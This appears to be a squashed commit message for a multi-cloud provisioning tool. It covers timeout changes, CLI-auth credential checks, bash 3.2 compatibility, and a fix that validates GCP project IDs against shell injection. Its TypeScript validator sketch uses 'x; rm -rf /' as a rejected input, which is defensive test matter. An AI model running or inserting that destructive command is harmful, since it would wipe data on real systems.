- Quality cycle was hitting the 45 min hard limit mid-run; bumped
CYCLE_TIMEOUT from 2400s (40 min) to 5400s (90 min) so E2E tests
(provision + install + verify across multiple clouds) have room to
complete without getting killed
- Updated qa-quality-prompt time budget from 35 min to 85 min to match
- Added _check_cli_auth_clouds() to key-request.sh: for clouds that use
CLI auth (gcp via gcloud), check if the CLI has an active account
instead of reporting them as missing and sending key-request emails
- GCP_PROJECT is loaded from ~/.config/spawn/gcp.json when gcloud is
authenticated; other CLI-auth clouds (sprite) are excluded from the
count since they are not auto-checkable
* fix: replace local -n namerefs with eval for bash 3.2 compatibility
local -n (namerefs) requires bash 4.3+ and breaks on macOS which ships
bash 3.2. Replace with eval-based variable indirection that works on
all supported bash versions.
Agent: pr-maintainer
Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com>
* fix: validate GCP_PROJECT format before export to prevent shell injection
Security: project ID from config now validated against ^[a-z][a-z0-9-]*$
pattern before export. Invalid IDs are rejected with a log message.
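The pattern check can be sketched as follows. The actual validation lives in a shell script; `isValidGcpProject` is a hypothetical TypeScript equivalent that uses the same pattern.

```typescript
// Pattern from this commit: a lowercase letter, then lowercase letters,
// digits, or hyphens. Nothing in this set is special to the shell.
const GCP_PROJECT_PATTERN = /^[a-z][a-z0-9-]*$/;

function isValidGcpProject(projectId: string): boolean {
  return GCP_PROJECT_PATTERN.test(projectId);
}

console.log(isValidGcpProject("my-project-123")); // true
console.log(isValidGcpProject("x; rm -rf /")); // false
```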
Agent: pr-maintainer
Co-Authored-By: Claude Sonnet 4.5 <noreply@anthropic.com>
---------
Co-authored-by: spawn-qa-bot <qa@openrouter.ai>
Co-authored-by: B <6723574+louisgv@users.noreply.github.com>
Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com>